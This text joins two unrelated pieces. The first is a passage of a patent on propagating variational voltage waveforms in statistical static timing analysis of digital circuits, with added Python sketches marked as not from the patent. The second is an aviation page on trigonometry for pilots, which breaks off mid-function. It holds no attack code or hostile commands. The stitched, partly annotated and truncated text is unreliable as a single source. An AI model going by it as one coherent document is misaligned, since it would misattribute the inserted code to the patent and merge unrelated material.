Thus, as mentioned earlier, a variational waveform can be considered a random function which can be evaluated from the values of environmental and process parameters. Accordingly, the signal crossing time tk in the variational waveform depends on the parameters X1, X2, . . . . Using the variational waveform model V(t, X1, X2, . . . ), one can calculate the sensitivity $\partial t_k / \partial X_i$ of crossing time tk to process parameter Xi by differentiating the implicit function V(t, Xi) = Vk = const, as follows in equation 10: $\frac{\partial V}{\partial t} \, dt + \frac{\partial V}{\partial X_i} \, dX_i = 0$ (10) Using equation 10 and collecting terms, the derivative of the crossing time with respect to process parameter Xi is obtained as presented in equation 11: $\left. \frac{\partial t}{\partial X_i} \right|_{V = V_k} = - \frac{\partial V / \partial X_i}{\partial V / \partial t}$ (11) The voltage waveform V(t) explicitly depends on the parameters X1, X2, . . . due to the dependency of A, B, C, D on the environmental and process parameters, i.e. A = A(X1, X2, . . . ), B = B(X1, X2, . . . ), C = C(X1, X2, . . . ), D = D(X1, X2, . . . ). Therefore, the chain rule can be employed to differentiate the variational waveform with respect to the environmental and process parameters. By differentiating the variational waveform (using equation 8) and evaluating the sensitivities at the nominal corner, one can obtain the equations presented below: $\left. \frac{\partial V}{\partial t} \right|_{V(t) = V_{nom}(t)} = \dot{V}_{nom}(t)$ (12) $\left. \frac{\partial V}{\partial X_i} \right|_{V(t) = V_{nom}(t)} = - \dot{V}_{nom}(t) \, \frac{\partial A}{\partial X_i}(t - t_0) - \dot{V}_{nom}(t) \, \frac{\partial B}{\partial X_i} + V_{nom}(t) \, \frac{\partial C}{\partial X_i} + V_{dd} \, \frac{\partial D}{\partial X_i}$ (13) By substituting the above equations into equation 11 and collecting terms, one can obtain the sensitivity of the waveform crossing time of voltage level Vk to parameter Xi evaluated at the nominal process corner, as follows in equation 14: $\left. \frac{\partial t}{\partial X_i} \right|_{V(t) = V_{nom}(t) = V_k} = \frac{\partial A}{\partial X_i}(t - t_0) + \frac{\partial B}{\partial X_i} - \frac{\partial C}{\partial X_i} \frac{V_{nom}(t)}{\dot{V}_{nom}(t)} - \frac{\partial D}{\partial X_i} \frac{V_{dd}}{\dot{V}_{nom}(t)}$ (14) Next, it is assumed that the parameters A, B, C, D in equation 8 can be represented as linear functions of Gaussian process variations, as shown in equations 15-18. Note that it is straightforward to extend the proposed technique to any model other than a linear function of Gaussian process variations. Suppose the parameters A, B, C, and D are in the following format: $A = \sum_{i=1}^{n} a_i \, \Delta X_i + a_{n+1} \, \Delta R_a$ (15) $B = \sum_{i=1}^{n} b_i \, \Delta X_i + b_{n+1} \, \Delta R_b$ (16) $C = \sum_{i=1}^{n} c_i \, \Delta X_i + c_{n+1} \, \Delta R_c$ (17) $D = \sum_{i=1}^{n} d_i \, \Delta X_i + d_{n+1} \, \Delta R_d$ (18) where: • $\Delta X_i = X_i - \hat{X}_i$ is the variation of the ith source of variation, Xi, from its nominal value $\hat{X}_i$; • ai, bi, ci, di are sensitivities of the variational parameters A, B, C, D to parameter Xi; • Ra, Rb, Rc, and Rd are normalized (zero mean and unit sigma) random variables employed to model the uncorrelated variations in A, B, C, and D, respectively; • an+1, bn+1, cn+1, dn+1 are sensitivities of the variational parameters A, B, C, D to their corresponding uncorrelated sources of variation. If A, B, C, D are in the linear format, the sensitivity of the waveform crossing time t at voltage level Vk to parameter Xi at the nominal corner is expressed as follows in equation 19: $\left. \frac{\partial t}{\partial X_i} \right|_{V(t) = V_{nom}(t) = V_k} = a_i(t - t_0) + b_i - c_i \frac{V_{nom}(t)}{\dot{V}_{nom}(t)} - d_i \frac{V_{dd}}{\dot{V}_{nom}(t)}$ (19)
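The linear Gaussian forms of equations 15-18 are easy to sample. The sketch below (not from the patent; the coefficient values and array layout are purely illustrative assumptions) draws Monte Carlo samples of the time stretching and shifting parameters A and B:

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical first-order coefficients for two correlated process
# parameters (X1, X2) plus one uncorrelated term each (cf. eq. 15-16).
a = np.array([0.02, -0.01, 0.005])    # A: time stretching coefficients
b = np.array([2e-12, 1e-12, 5e-13])   # B: time shifting coefficients (s)

def sample_AB(n_samples):
    """Draw samples of A and B from the linear Gaussian model:
    A = sum_i a_i*dX_i + a_{n+1}*dR_a, and similarly for B."""
    dX = rng.standard_normal((n_samples, 2))   # shared parameters dX1, dX2
    dRa = rng.standard_normal(n_samples)       # uncorrelated residual of A
    dRb = rng.standard_normal(n_samples)       # uncorrelated residual of B
    A = dX @ a[:2] + a[2] * dRa
    B = dX @ b[:2] + b[2] * dRb
    return A, B

A_s, B_s = sample_AB(10000)   # each sample defines one perturbed waveform
```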
On the other hand, the crossing time tk of the variational waveform V(t) can be approximated with a first order form as a function of the process variation parameters, as follows in equation 20: $t_k = \tau_{k,0} + \sum_{i=1}^{n} \tau_{k,i} \, \Delta X_i + \tau_{k,n+1} \, \Delta R_t$ (20) where: • τk,0 is the nominal value of the crossing time tk; • $\Delta X_i = X_i - \hat{X}_i$ is the variation of the ith source of variation, Xi, from its nominal value $\hat{X}_i$; • τk,i is the sensitivity of the crossing time tk to the parameter Xi; • ΔRt is the variation of the uncorrelated random parameter Rt, and τk,n+1 is the sensitivity of the crossing time tk to the uncorrelated variation ΔRt. Therefore, given the coefficients ai, bi, ci, di of the variational waveform parameters A, B, C, and D (equations 15-18), each coefficient τk,i in equation 20 can be calculated using equation 19. Parameterized block-based SSTA requires two main operations on signal models: propagation of signals through gates and interconnects, and computation of the latest or earliest signal at any node with a fan-in of two or more. Below is a discussion of techniques that handle these operations on variational waveforms for SSTA. Consider the transistor level representation of a CMOS inverter shown in FIG. 4A. If the leakage current is ignored, the steady state voltage level at the gate output terminal is either Vss (ground voltage, 401) or Vdd (power supply voltage, 402). Assume that the input waveform slew, 403, does not move outside its legal range (e.g., the range over which the inverter delay has been characterized) even under the effect of environmental and process variations. Therefore, the C and D terms in equation 8 for the output voltage waveform, 404 (i.e. the voltage stretching and shifting operators) are only functions of power (i.e. Vdd) and ground (i.e. Vss) voltage variations and do not depend on either the input waveform variations, 403, or gate parameter variations. Thus, C and D can be derived from equations 5 and 6 with the assumption that Vnom,low = 0 (i.e. the nominal ground voltage value) and Vnom,high = Vdd,nom (i.e. the nominal supply voltage value), as shown in equations 21 and 22. Note that Vlow is the actual value of the ground voltage Vss and Vhigh is the actual value of the supply voltage Vdd. $C = \frac{V_{dd} - V_{ss}}{V_{dd,nom}} - 1$ (21) $D = \frac{V_{ss} - V_{ss,nom}}{V_{dd,nom}}$ (22) In the above equations, Vdd and Vss are in the first order form as functions of process variations. On the other hand, as shown in FIG. 4B, since an interconnect does not affect the voltage levels, the steady state voltages at the source pin, 405, and sink pin, 406, of the interconnect are the same. As a result, the C and D terms of the variational waveform at the sink pin of the interconnect, Vout(t), and the source pin of the interconnect, Vin(t), are equal. For any environmental and process parameters, different techniques (e.g. finite differencing or direct/adjoint sensitivity analysis) can be employed to compute the sensitivities of the voltage crossing time points, which are not within the scope of this invention. The following is a discussion of how to compute the time shifting and time stretching operators (i.e. the A and B terms in equation 8) for propagating them through gates and interconnects. Consider the variational waveforms as shown in FIGS. 4A-4B.
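As a concrete illustration of the finite-differencing option mentioned above, the sketch below (not from the patent; the ramp model, parameter, and function names are illustrative assumptions) estimates the sensitivity of a crossing time to a parameter by perturbing the parameter and re-measuring the crossing time:

```python
import numpy as np

def crossing_time(t, v, level):
    """First time the sampled rising waveform v(t) crosses `level`,
    using linear interpolation between the two bracketing samples.
    Assumes the waveform actually crosses the level."""
    i = int(np.argmax(v >= level))
    return t[i-1] + (level - v[i-1]) * (t[i] - t[i-1]) / (v[i] - v[i-1])

def crossing_sensitivity(waveform_of_x, t, x0, level, dx=1e-6):
    """Central finite-difference estimate of dt_k/dX_i (cf. eq. 11):
    perturb the parameter, rebuild the waveform, re-measure t_k."""
    t_plus = crossing_time(t, waveform_of_x(x0 + dx), level)
    t_minus = crossing_time(t, waveform_of_x(x0 - dx), level)
    return (t_plus - t_minus) / (2.0 * dx)

# Toy example: parameter x scales the ramp's transition time, so the
# 50% crossing moves as 0.2 + 0.2*(1 + x) and dt/dx = 0.2.
t = np.linspace(0.0, 1.0, 2001)
ramp = lambda x: np.clip((t - 0.2) / (0.4 * (1.0 + x)), 0.0, 1.0)
s = crossing_sensitivity(ramp, t, x0=0.0, level=0.5, dx=1e-4)  # ~0.2
```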
For any process parameter, sensitivities of the output waveform, 404 and 406, crossing times to environmental and process parameters can be computed using different techniques, including finite differencing and direct or adjoint sensitivity analysis. When advanced gate modeling techniques (such as current source modeling) are used, these sensitivities can even be computed analytically. Referring to FIG. 5, there is a flow chart describing the computation of the time shifting and stretching operators (i.e. the A, B terms) of the propagated variational waveform, 404 and 406. The process begins at 510, where a set of voltage levels V1, V2, . . . is selected such that propagating their corresponding crossing times t1, t2, . . . yields enough accuracy in the final timing results. Note that there is a trade-off between memory requirements versus accuracy versus runtime in choosing the number of voltage levels. Apparently, the required number of voltage levels is a function of the CMOS technology and the waveform shapes. As shown in FIG. 5, the next step 520 is to compute the nominal output waveform Vout,nom(t) using a deterministic (i.e. non-variational) model of the gate or the interconnect. Following, in step 530, for each selected voltage level Vk and each process parameter Xi, the sensitivity $s_{i,k} = \left. \frac{\partial t}{\partial X_i} \right|_{V_{out,nom}(t) = V_k}$ of crossing time tk of the output waveform Vout(t) to each process parameter Xi is computed and evaluated at the nominal process corner. In step 540, for each process parameter Xi, a least squares fitting problem Psens,i is constructed to compute the coefficients ai, bi of the first order model of A and B to match the sensitivities si,k of crossing times tk for each voltage level Vk of the output waveform Vout(t). Then the coefficients ai, bi of the first order forms A and B are computed by solving each least squares problem Psens,i. In step 550, for each selected voltage level Vk, the sensitivity sn+1,k of crossing time tk to uncorrelated variations is computed as: $s_{n+1,k} = \sqrt{ \sum_{j \in \text{all uncorrelated variations}} s_{n+1,k,j}^2 }$ (23) where sn+1,k,j is the sensitivity of crossing time tk to the j-th source of uncorrelated variations. The summation is performed across all sources of uncorrelated variations: the input variational waveform, ground and supply voltages, the gate (or interconnect) parameters, and the parameters of its load. In step 560, for each selected voltage level Vk, the variance $\sigma_k^2$ of its crossing time is computed as $\sum_{i=1}^{n+1} s_{i,k}^2$. In step 570, a least squares fitting problem PVar is constructed to compute the sensitivities an+1, bn+1 of the first order forms A, B to uncorrelated variations by matching the variances $\sigma_k^2$ of crossing times tk. Next, the coefficients an+1, bn+1 of the first order canonical forms A, B are computed by solving the least squares problem PVar. Next, using the computed first order forms of the terms A and B, the propagated variational waveform is constructed in the canonical form, as presented in 580. Below is an explanation of the least squares fitting problem Psens,i for computing the coefficients ai, bi of the first order forms A and B. In this scenario, V1, V2, . . . are m selected voltage levels; t1, t2, . . . are the m corresponding crossing times of the nominal output waveform; si,1, si,2, . . . are the sensitivities of the crossing times to process parameter Xi. The coefficients ai, bi of the first order forms A, B are computed by minimizing the sum of squared errors of the sensitivities at each voltage level, as follows: $\min_{a_i, b_i} \sum_{k=1}^{m} \left( s_{i,k} - a_i(t_k - t_0) - b_i + c_i \frac{V_{nom}(t_k)}{\dot{V}_{nom}(t_k)} + d_i \frac{V_{dd,nom}}{\dot{V}_{nom}(t_k)} \right)^2$ (24)
If the variation of power and ground voltages is ignored, equation 24 can be simplified as: $\min_{a_i, b_i} \sum_{k=1}^{m} \left( s_{i,k} - a_i(t_k - t_0) - b_i \right)^2$ (25) Equation 25 is a linear least squares problem. Thus, it can be solved efficiently since it only has two unknown variables, ai, bi, and a limited set of equations (i.e. the number of equations is equal to the number of selected voltage levels). If the crossing times for certain of the selected voltage levels Vk of the waveform are known to have a greater influence on the behavior (e.g., delay) of circuits to which the waveform is applied as an input, the errors for these crossing times may be weighted more heavily in this and subsequent least squares problems, creating a result that more closely approximates the actual waveform around these points. Next, the least squares fitting problem for computing the sensitivities an+1, bn+1 of the canonical forms A, B to uncorrelated variations is clarified. In this scenario, V1, V2, . . . are m selected voltage levels; t1, t2, . . . are the m corresponding crossing times of the nominal output waveform; $\sigma_1^2, \sigma_2^2, \dots$ are the variances of the output waveform crossing times at the selected voltage levels; a1, b1, a2, b2, . . . , an, bn are the coefficients of the first order forms A, B. Thus, the coefficients an+1 and bn+1 of the first order forms A, B are computed by minimizing the sum of squared errors of the crossing time variances: $\min_{a_{n+1}^2, \, b_{n+1}^2} \sum_{k=1}^{m} \left( \sigma_k^2 - \sum_{i=1}^{n} z_{i,k}^2 - y_k^2 - a_{n+1}^2 (t_k - t_0)^2 - b_{n+1}^2 \right)^2$ (26) where: $z_{i,k} = a_i(t_k - t_0) + b_i - c_i \frac{V_{nom}(t_k)}{\dot{V}_{nom}(t_k)} - d_i \frac{V_{dd,nom}}{\dot{V}_{nom}(t_k)}$ is the approximated sensitivity of the k-th crossing time to process parameter Xi, and $y_k^2 = c_{n+1}^2 \left( \frac{V_{nom}(t_k)}{\dot{V}_{nom}(t_k)} \right)^2 + d_{n+1}^2 \left( \frac{V_{dd,nom}}{\dot{V}_{nom}(t_k)} \right)^2$ is the k-th crossing time variance component due to the voltage shifting and scaling terms C, D. Equation 26 is a linear least squares problem with respect to the unknown variables $a_{n+1}^2$ and $b_{n+1}^2$. The algorithm presented in FIG. 5 requires sensitivities of the output waveform crossing times to process variation parameters at the nominal process corner. These values can be obtained from variational models of gates and interconnects. The following is a discussion of an algorithm for computing the statistical maximum/minimum of two variational waveforms. These operations are required to calculate the latest/earliest signal at any node with a fan-in of two or more in block-based SSTA. The discussion is limited to a linear approximation of the statistical minimum/maximum operation and a first-order variational representation of the time and voltage shifting and scaling terms. However, it is possible to construct an algorithm for a higher order approximation of the statistical minimum and maximum operation and a higher order approximation of the shifting and scaling terms. As an example, consider a two input CMOS gate and two variational waveforms v1(t) and v2(t) which are separately propagated from the two gate input terminals to its output terminal using the technique described above. The goal is to compute the best fitted variational waveform vmax(t) (i.e. in the form of equation 8) which approximates the statistical maximum of v1(t) and v2(t) with minimum error.
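The simplified problem in equation 25 is an ordinary linear least squares fit with two unknowns. A minimal sketch (not from the patent; the sample numbers are made up) using numpy:

```python
import numpy as np

def fit_time_terms(t_k, s_ik, t0=0.0):
    """Fit a_i, b_i of equation 25: minimize
    sum_k (s_ik - a_i*(t_k - t0) - b_i)^2 over a_i, b_i."""
    t_k = np.asarray(t_k, dtype=float)
    s_ik = np.asarray(s_ik, dtype=float)
    # Design matrix: one column for the stretching slope a_i,
    # one constant column for the shifting offset b_i.
    G = np.column_stack([t_k - t0, np.ones_like(t_k)])
    (a_i, b_i), *_ = np.linalg.lstsq(G, s_ik, rcond=None)
    return a_i, b_i

# Crossing times (ps) at five voltage levels and hypothetical
# sensitivities of those crossing times to one process parameter:
a_i, b_i = fit_time_terms(t_k=[10, 20, 30, 40, 50],
                          s_ik=[1.1, 2.05, 2.9, 4.1, 5.0])
```

Weighted fitting, as the text suggests for influential voltage levels, amounts to scaling the rows of G and s_ik before solving.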
As explained above, the voltage stretching (C) and voltage shifting (D) terms of v1(t) and v2(t) must be equal, since these terms are functions of the gate power supply and ground voltage variations rather than the gate parameters and the gate variational input waveforms. Therefore, the resulting variational maximum waveform will have the same voltage stretching and voltage shifting terms C, D. As a result, only the time stretching and time shifting terms A, B of the variational maximum waveform are computed. To do that, a mixed flavor of the technique presented in FIG. 5 and the well-known statistical max operation is employed. The crossing times of the two waveforms whose max is being computed are represented with their first order canonical forms. Therefore, the statistical maximum of each pair of corresponding crossing times can be computed. Next, the time stretching and time shifting parameters of the variational waveform are computed by fitting the sensitivities and standard deviations of the crossing times, as explained in FIG. 6. Referring to FIG. 6, a set of voltage levels V1, V2, . . . is selected at 610 such that propagating their corresponding crossing times t1, t2, . . . yields enough accuracy in the final arrival time results. Note that there is a trade-off between accuracy and runtime in choosing the number of voltage levels. Apparently, the required number of voltage levels is a function of the CMOS technology and the waveform shapes. Next, in 620, the sensitivities of the waveform crossing times to process parameters at the selected voltage levels are computed. This will help to construct the first order canonical form for the waveform crossing times at the selected voltage levels, as explained in step 630. In step 640, the first order canonical form of the maximum of the resulting waveform crossing times at the selected voltage levels is computed by applying a statistical MAX operation to the canonical forms of the input waveform crossing times. The resulting canonical forms contain the sensitivities of the resulting waveform crossing times to process parameters. Then, in step 650, for each process parameter Xi, a least squares fitting problem is constructed to compute the coefficients ai, bi of the canonical forms of the resulting waveform's time stretching and time shifting terms A and B by matching the sensitivities of the crossing times for each crossing point of the variational waveform. This makes it possible to compute the coefficients ai, bi of the canonical forms A and B by solving the least squares fitting problem. In step 660, a least squares fitting problem is constructed to compute the sensitivities an+1 and bn+1 of the canonical forms A, B to uncorrelated variations by matching the standard deviations of the crossing times and, thereby, to compute the coefficients an+1, bn+1 of the canonical forms A, B by solving the least squares fitting problem. Finally, the resulting variational waveform in the canonical form is computed by using the canonical forms of the terms A and B in step 670. Similarly, one can compute the statistical minimum of two variational waveforms in the first order canonical form, which is critical for calculating the earliest arrival times in a timing run. FIG. 7 shows a schematic of an exemplary computing environment in which an SSTA tool that represents and propagates a variational voltage waveform according to one embodiment of this invention may operate.
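The "well-known statistical max operation" referenced here is commonly implemented with Clark's moment-matching approximation for the maximum of two Gaussians; the specific formulation below is an assumption, not taken from the patent:

```python
import numpy as np
from scipy.stats import norm

def stat_max(m1, s1, m2, s2, rho=0.0):
    """Clark's approximation for max(T1, T2) of two jointly Gaussian
    crossing times with means m1, m2, sigmas s1, s2, correlation rho.
    Returns the matched mean and sigma of the maximum."""
    theta = np.sqrt(s1**2 + s2**2 - 2.0 * rho * s1 * s2)
    if theta == 0.0:                  # perfectly correlated, equal sigma
        return max(m1, m2), s1
    alpha = (m1 - m2) / theta
    phi, Phi = norm.pdf(alpha), norm.cdf(alpha)
    mean = m1 * Phi + m2 * (1.0 - Phi) + theta * phi
    second_moment = ((m1**2 + s1**2) * Phi + (m2**2 + s2**2) * (1.0 - Phi)
                     + (m1 + m2) * theta * phi)
    return mean, np.sqrt(max(second_moment - mean**2, 0.0))

# Example: two crossing times (ps) at the same voltage level.
mean_max, sigma_max = stat_max(100.0, 5.0, 102.0, 7.0, rho=0.3)
```

In canonical-form SSTA, the per-parameter sensitivities of the max are then typically blended using the tightness probability Φ(α); the fitting of the A and B terms described above turns those matched crossing-time statistics back into a waveform.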
The exemplary computing environment 700 is only one example of a suitable computing environment and is not intended to suggest any limitation as to the scope of use or functionality of the approach described herein. Neither should the computing environment 700 be interpreted as having any dependency or requirement relating to any one or combination of components illustrated in FIG. 7. In the computing environment 700 there is a computer 702 which is operational with numerous other general purpose or special purpose computing system environments or configurations. Examples of well known computing systems, environments, and/or configurations that may be suitable for use with an exemplary computer 702 include, but are not limited to, personal computers, server computers, thin clients, thick clients, hand-held or laptop devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, distributed computing environments that include any of the above systems or devices, and the like. The exemplary computer 702 may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, logic, data structures, and so on, that perform particular tasks or implement particular abstract data types. The exemplary computer 702 may be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices. As shown in FIG. 7, the computer 702 in the computing environment 700 is shown in the form of a general-purpose computing device. The components of computer 702 may include, but are not limited to, one or more processors or processing units 704, a system memory 706, and a bus 708 that couples various system components including the system memory 706 to the processor 704. Bus 708 represents one or more of any of several types of bus structures, including a memory bus or memory controller, a peripheral bus, an accelerated graphics port, and a processor or local bus using any of a variety of bus architectures. By way of example, and not limitation, such architectures include Industry Standard Architecture (ISA) bus, Micro Channel Architecture (MCA) bus, Enhanced ISA (EISA) bus, Video Electronics Standards Association (VESA) local bus, and Peripheral Component Interconnects (PCI) bus. The computer 702 typically includes a variety of computer readable media. Such media may be any available media that is accessible by computer 702, and it includes both volatile and non-volatile media, removable and non-removable media. In FIG. 7, the system memory 706 includes computer readable media in the form of volatile memory, such as random access memory (RAM) 710, and/or non-volatile memory, such as ROM 712. A BIOS 714 containing the basic routines that help to transfer information between elements within computer 702, such as during start-up, is stored in ROM 712. RAM 710 typically contains data and/or program modules that are immediately accessible to and/or presently operated on by processor 704. Computer 702 may further include other removable/non-removable, volatile/non-volatile computer storage media. By way of example only, FIG.
7 illustrates a hard disk drive 716 for reading from and writing to non-removable, non-volatile magnetic media (not shown and typically called a hard drive), a magnetic disk drive 718 for reading from and writing to a removable, non-volatile magnetic disk 720 (e.g., a floppy disk), and an optical disk drive 722 for reading from or writing to a removable, non-volatile optical disk 724 such as a CD-ROM, DVD-ROM or other optical media. The hard disk drive 716, magnetic disk drive 718, and optical disk drive 722 are each connected to bus 708 by one or more data media interfaces 726. The drives and their associated computer-readable media provide nonvolatile storage of computer readable instructions, data structures, program modules, and other data for computer 702. Although the exemplary environment described herein employs a hard disk drive 716, a removable magnetic disk 720 and a removable optical disk 724, it should be appreciated by those skilled in the art that other types of computer readable media which can store data that is accessible by a computer, such as magnetic cassettes, flash memory cards, digital video disks, RAMs, ROM, and the like, may also be used in the exemplary operating environment. A number of program modules may be stored on the hard disk 716, magnetic disk 720, optical disk 724, ROM 712, or RAM 710, including, by way of example, and not limitation, an operating system 728, one or more application programs 730, other program modules 732, and program data 734. Each of the operating system 728, one or more application programs 730, other program modules 732, and program data 734, or some combination thereof, may include an implementation of an SSTA tool that represents and propagates a variational voltage waveform according to one embodiment of this invention. A user may enter commands and information into computer 702 through optional input devices such as a keyboard 736 and a pointing device 738 (such as a mouse). Other input devices (not shown) may include a microphone, joystick, game pad, satellite dish, serial port, scanner, camera, or the like. These and other input devices are connected to the processor unit 704 through a user input interface 740 that is coupled to bus 708, but may be connected by other interface and bus structures, such as a parallel port, game port, or a universal serial bus (USB). An optional monitor 742 or other type of display device is also connected to bus 708 via an interface, such as a video adapter 744. In addition to the monitor, personal computers typically include other peripheral output devices (not shown), such as speakers and printers, which may be connected through output peripheral interface 746. Computer 702 may operate in a networked environment using logical connections to one or more remote computers, such as a remote server/computer 748. Remote computer 748 may include many or all of the elements and features described herein relative to computer 702. Logical connections shown in FIG. 7 are a local area network (LAN) 750 and a general wide area network (WAN) 752. Such networking environments are commonplace in offices, enterprise-wide computer networks, intranets, and the Internet. When used in a LAN networking environment, the computer 702 is connected to LAN 750 via network interface or adapter 754. When used in a WAN networking environment, the computer typically includes a modem 756 or other means for establishing communications over the WAN 752.
The modem, which may be internal or external, may be connected to the system bus 708 via the user input interface 740 or other appropriate mechanism. In a networked environment, program modules depicted relative to the personal computer 702, or portions thereof, may be stored in a remote memory storage device. By way of example, and not limitation, FIG. 7 illustrates remote application programs 758 as residing on a memory device of remote computer 748. It will be appreciated that the network connections shown and described are exemplary and other means of establishing a communications link between the computers may be used. An implementation of an exemplary computer 702 may be stored on or transmitted across some form of computer readable media. Computer readable media can be any available media that can be accessed by a computer. By way of example, and not limitation, computer readable media may comprise computer storage media and communication media. Computer storage media include volatile and non-volatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules, or other data. Computer storage media include, but are not limited to, RAM, ROM, EEPROM, flash memory or other memory technology, CD-ROM, digital versatile disks (DVD) or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other medium which can be used to store the desired information and which can be accessed by a computer. Communication media typically embody computer readable instructions, data structures, program modules, or other data in a modulated data signal, such as a carrier wave or other transport mechanism. Communication media also include any information delivery media. The term "modulated data signal" means a signal that has one or more of its characteristics set or changed in such a manner as to encode information in the signal. By way of example, and not limitation, communication media include wired media such as a wired network or direct-wired connection, and wireless media such as acoustic, RF, infrared, and other wireless media. Combinations of any of the above are also included within the scope of computer readable media. It is apparent that there has been provided by this invention an approach for representing and propagating a variational voltage waveform in statistical static timing analysis of digital circuits. While the invention has been particularly shown and described in conjunction with a preferred embodiment thereof, it will be appreciated that variations and modifications will occur to those skilled in the art. Therefore, it is to be understood that the appended claims are intended to cover all such modifications and changes as fall within the true spirit of the invention. ## Claims 1.
A method for statistical static timing analysis of a digital circuit, comprising: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 2. The method according to claim 1, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 3. The method according to claim 1, wherein the plurality of waveform transformation operators are represented in a canonical format. 4. The method according to claim 1, wherein the propagating of variational waveforms comprises determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 5. The method according to claim 1, wherein the propagating of variational waveforms comprises determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc. 6. A computer-readable medium storing computer instructions, which when executed, enables a computer system to perform a statistical static timing analysis of a digital circuit, the computer instructions comprising: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 7.
The computer-readable medium according to claim 6, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 8. The computer-readable medium according to claim 6, wherein the plurality of waveform transformation operators are represented in a canonical format. 9. The computer-readable medium according to claim 6, wherein the propagating of variational waveforms comprises instructions for determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 10. The computer-readable medium according to claim 6, wherein the propagating of variational waveforms comprises instructions for determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc. 11. A statistical static timing analysis tool for analyzing digital circuit designs, comprising: a variational waveform modeling component that is configured to generate a variational waveform model that approximates arbitrary waveform transformations of waveforms at nodes of a digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and a variational waveform propagating component configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. 12. The tool according to claim 11, wherein the plurality of waveform transformation operators comprise time shifting, time stretching, voltage shifting and voltage stretching operators. 13. The tool according to claim 11, wherein the plurality of waveform transformation operators are represented in a canonical format. 14. The tool according to claim 11, wherein the propagating of variational waveforms comprises determining sensitivities of each of the plurality of waveform transformation operators to a particular source of variation through the timing arc. 15. The tool according to claim 11, wherein the propagating of variational waveforms comprises determining a statistical maximum and/or statistical minimum of two variational waveforms through the timing arc.
http://code7700.com/trigonometry.htm
# Math: Trig Do pilots really need to know trigonometry? No. But much of what we do is governed by it, and there are times you wonder about all things navigation, lateral and vertical, where a good dose of trig will explain the unexplainable. Figure: Portrait of Pythagoras, from Wikimedia Commons. ### Sum of Angles Figure: Sum of angles in a triangle, from Eddie's notes. If you draw a triangle with one leg parallel to a straight line, you discover that the angles along the parallel leg are equal to the angles opposite the angle that touches the straight line, which by definition is an angle of 180°. So you can infer that the sum of the three angles in a triangle is 180°. If you have a right triangle, you know one of the angles is 90°. That means the sum of the other two angles is 90°. ### Sum of Legs Figure: Right triangle legs, from Eddie's notes. If two sides of a right triangle are known, the third side can be found using the Pythagorean Theorem: $c^2 = a^2 + b^2$ ### Trigonometric Functions #### Sine $\sin A = \frac{\text{side opposite } A}{\text{hypotenuse}} = \frac{a}{c}$ #### Cosine $\cos A = \frac{\text{side adjacent } A}{\text{hypotenuse}} = \frac{b}{c}$ #### Tangent $\tan A = \frac{\text{side opposite } A}{\text{side adjacent } A} = \frac{a}{b}$ #### Cotangent $\cot A = \frac{\text{side adjacent } A}{\text{side opposite } A} = \frac{b}{a}$ #### Secant $\sec A = \frac{\text{hypotenuse}}{\text{side adjacent } A} = \frac{c}{b}$ #### Cosecant $\csc A = \frac{\text{hypotenuse}}{\text{side opposite } A} = \frac{c}{a}$ ### Inverse Trigonometric Functions If x = sin y, then y = arcsin x. If x = cos y, then y = arccos x. If x = tan y, then y = arctan x. If x = cot y, then y = arccot x. If x = sec y, then y = arcsec x. If x = csc y, then y = arccsc x. ### A Few Examples #### Circling Offset Figure: 30° circling offset, from Eddie's notes. The sine of 30° = 0.5, which offers us easy math for many situations. When approaching a runway to circle to the opposite side, for example, one often offsets 30 degrees to establish a downwind. The distance offset is equal to half the distance covered in the offset leg. More about this: Circling Approach. #### Course Deviation Figure: Course azimuth deviation, from Eddie's notes. The tangent of an angle provides the relationship of a triangle's two legs adjacent to the right angle. Multiplied by the distance left to travel, the tangent of an angle will provide the course deviation. More about this: Stabilized Approach. #### Crosswinds Figure: Crosswind chart example, from Eddie's notes. Just as the sine of 30° = 0.5, the cosine of 60° = 0.5. You can also figure that the sine of 60° or the cosine of 30° is √3 / 2 = 0.87, almost 90 percent. The sine or cosine of 45° is 1 / √2 = 0.71, almost three-fourths. That leads to a few handy rules of thumb when it comes to crosswinds: • A thirty degree crosswind is equal to one-half the full wind factor. • A forty-five degree crosswind is equal to three-fourths the full wind factor. • A sixty degree crosswind is equal to ninety percent of the full wind factor. #### Vertical Navigation on Approach Figure: AGL vs. DME to go, from Eddie's notes. We often use 300 feet per nautical mile as a WAG for how high we should be on final approach. It is pretty close to a three degree glide path, convenient eh? It is more than convenience, it is trigonometry.
The real number, as it turns out, is 318 feet per nautical mile: $\text{Height} = 6076 \tan(3°) \approx 318 \text{ feet}$
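These rules of thumb are easy to check numerically. Here is a small Python sketch (not from the original page; the function names are mine) that computes the crosswind component and the height on a 3° glide path, using the same 6076 ft per nautical mile conversion:

```python
import math

def crosswind_component(wind_kts, angle_off_deg):
    """Crosswind = wind speed x sin(angle between wind and runway)."""
    return wind_kts * math.sin(math.radians(angle_off_deg))

def height_on_path(dist_nm, glidepath_deg=3.0):
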